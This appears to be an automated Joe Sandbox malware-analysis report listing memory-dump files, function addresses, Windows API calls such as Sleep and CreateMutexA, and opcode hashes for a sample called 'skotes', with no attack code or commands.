Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 75b40a47f60a7bb090a2c69e2a732e041eb7b5962ee00cb2749145298dca1079
Instruction ID: 9759e23767449883cb93945dcd19c9d8eb4d187d8ee9d0fc5f1f7fdfd1ebc426
Opcode Fuzzy Hash: 75b40a47f60a7bb090a2c69e2a732e041eb7b5962ee00cb2749145298dca1079
Instruction Fuzzy Hash: 372179317043809BEB18AB6DEC85B2DB762EBD1310F244229E414C73D6DBB569818752

Function 00AEA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 24293a1c796dbaf98ece8fed08951bc87409cbe6c7a608a404660a329f2d2b97
Instruction ID: 59c9233a12ad8d7f357a25d95bea77b2babe8ea601f4fb6b7f1fc7889206bcdf
Opcode Fuzzy Hash: 24293a1c796dbaf98ece8fed08951bc87409cbe6c7a608a404660a329f2d2b97
Instruction Fuzzy Hash: DB217C312452809AFB28676A9D8673DB362DF91700F244856F448D72D2CF7A69818693

Function 00AEA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 19cf37986a84894fd296d110c09eef8b25c1b59d2b3693eabccf1fbe5269ffef
Instruction ID: 6792525a8d348125c441c94b0090bc046fe6e2b252507bd5764fe5057dff9527
Opcode Fuzzy Hash: 19cf37986a84894fd296d110c09eef8b25c1b59d2b3693eabccf1fbe5269ffef
Instruction Fuzzy Hash: C4219B323002409BEB189B6DDC8576CB762EBE1311F24422AF414DB7D5CB75BA808792

Non-executed Functions

Function 00AE2EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00AE2F5F
GetCurrentThreadId.KERNEL32 ref: 00AE2F7E
__Mtx_unlock.LIBCPMT ref: 00AE2FCC
__Cnd_broadcast.LIBCPMT ref: 00AE2FE3
__Mtx_unlock.LIBCPMT ref: 00AE30F5
GetCurrentThreadId.KERNEL32 ref: 00AE3132
__Mtx_unlock.LIBCPMT ref: 00AE319B

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: a05f52cd1464f2725b411b42d1cbbb792825536efb2119ab9a29c0e5095b6ac0
Instruction ID: 903644b07cd85c833c72f9627c1389e957c0c0bc9f195f5d369d86838764f0d9
Opcode Fuzzy Hash: a05f52cd1464f2725b411b42d1cbbb792825536efb2119ab9a29c0e5095b6ac0
Instruction Fuzzy Hash: BEA1D271A05249DFDF10DFA6CA487AAB7F8FF15320F048269E915D7241EB31EA04CB91

Function 00B1CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B1CC66

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
